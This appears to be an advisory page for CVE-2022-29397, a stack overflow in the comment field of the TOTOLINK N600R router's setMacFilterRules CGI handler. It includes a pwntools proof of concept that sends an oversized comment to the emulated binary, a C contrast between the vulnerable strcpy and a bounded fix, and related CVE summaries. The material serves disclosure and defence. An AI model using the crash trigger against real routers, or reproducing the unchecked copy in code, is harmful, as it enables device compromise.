CVE-2022-29397: IoT-vuln/Totolink/4.setMacFilterRules at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_004196c8.


The vulnerability is in the router's web component, /web_cste/cgi-bin/cstecgi.cgi. The function FUN_004196c8 (at address 0x04196c8) reads the JSON parameter comment and, without checking its length, copies it directly into a local stack buffer, causing a stack overflow:

from pwn import *
import json

# JSON request body handled by cstecgi.cgi; the oversized "comment"
# value (0x200 bytes) is what overflows the stack buffer in FUN_004196c8.
data = {
    "topicurl": "setting/setMacFilterRules",
    "addEffect": "0",
    "macAddress": "A:A:A:A",
    "comment": "A" * 0x200,
}
data = json.dumps(data)
print(data)

# Run the MIPS CGI binary under qemu-user with a gdb stub on port 1234,
# the firmware's libraries in ./lib, a preloaded hook library, and the
# environment a web server would normally hand to the CGI
# (CONTENT_LENGTH, REMOTE_ADDR).
argv = [
    "qemu-mips-static",
    "-g", "1234",
    "-L", "./lib",
    "-E", "LD_PRELOAD=./hook.so",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecgi.cgi",
]

a = process(argv=argv)

# The CGI reads the request body from stdin.
a.sendline(data.encode())

a.interactive()
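To make the bug class concrete from the defender's side, here is an added C example (not code from the page, from TOTOLINK's firmware, or from the d1tto/IoT-vuln repository). It reconstructs the pattern the description names, an unbounded copy of the JSON "comment" value into a fixed-size stack buffer, next to a checked version that rejects over-long input. The structure name, the function names and the 64-byte buffer size are assumptions; the real buffer size in FUN_004196c8 is not stated on the page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of the setMacFilterRules handler's copy
 * logic. COMMENT_BUF_SIZE is an assumed value; the page does not give
 * the real size of the stack buffer in FUN_004196c8. */
#define COMMENT_BUF_SIZE 64

struct mac_filter_rule {
    char mac[32];
    char comment[COMMENT_BUF_SIZE];
};

/* Vulnerable pattern: the attacker-controlled "comment" string is copied
 * into a fixed-size stack buffer with no length check. Any value longer
 * than COMMENT_BUF_SIZE overwrites what sits above the buffer on the stack,
 * which is what a 0x200-byte comment like the one in the PoC triggers.
 * Shown for contrast only; never call it with untrusted input. */
void set_comment_vulnerable(struct mac_filter_rule *rule, const char *comment)
{
    char local[COMMENT_BUF_SIZE];
    strcpy(local, comment);            /* unbounded copy: stack overflow */
    strcpy(rule->comment, local);
}

/* Hardened pattern: measure the input with a bounded scan, reject anything
 * that does not fit together with its terminator, and always NUL-terminate.
 * Returns 0 on success and -1 when the comment is rejected; on rejection
 * rule->comment is left untouched. */
int set_comment_checked(struct mac_filter_rule *rule, const char *comment)
{
    if (comment == NULL)
        return -1;
    size_t len = 0;
    /* bounded scan: an unterminated input cannot run past COMMENT_BUF_SIZE */
    while (len < COMMENT_BUF_SIZE && comment[len] != '\0')
        len++;
    if (len >= COMMENT_BUF_SIZE)       /* no room for the terminator */
        return -1;
    memcpy(rule->comment, comment, len);
    rule->comment[len] = '\0';
    return 0;
}

/* Predicate for a request validator or detection rule placed in front of
 * the CGI: 1 if a comment of this length would overflow the assumed buffer. */
int comment_would_overflow(size_t comment_len)
{
    return comment_len >= COMMENT_BUF_SIZE;
}

/* Self-checks that return 1 on the expected outcome. */
int check_short_comment_accepted(void)
{
    struct mac_filter_rule rule;
    memset(&rule, 0, sizeof rule);
    return set_comment_checked(&rule, "guest laptop") == 0
        && strcmp(rule.comment, "guest laptop") == 0;
}

int check_long_comment_rejected(void)
{
    struct mac_filter_rule rule;
    memset(&rule, 0, sizeof rule);
    char big[0x200 + 1];               /* same size as the PoC's comment */
    memset(big, 'A', 0x200);
    big[0x200] = '\0';
    int rc = set_comment_checked(&rule, big);
    return rc == -1 && rule.comment[0] == '\0';
}

int main(void)
{
    printf("short comment accepted: %d\n", check_short_comment_accepted());
    printf("0x200-byte comment rejected: %d\n", check_long_comment_rejected());
    return 0;
}
```

The checked version is deliberately strict rather than truncating: silently cutting a comment to 63 bytes would hide the fact that a client sent something the handler was never designed to store, and a rejected request is the better signal for logging and alerting on a device that exposes this CGI.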

Related news

CVE-2022-29393: IoT-vuln/Totolink/3.setIpQosRules at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_004192cc.

CVE-2022-29396: IoT-vuln/Totolink/8.setIpPortFilterRules at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_00418f10.

CVE-2022-29392: IoT-vuln/Totolink/2.setPortForwardRules at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_00418c24.

CVE-2022-29399: IoT-vuln/Totolink/9.setUrlFilterRules at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the url parameter in the function FUN_00415bf0.

CVE-2022-29391: IoT-vuln/Totolink/5.setStaticDhcpConfig at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the comment parameter in the function FUN_004200c8.
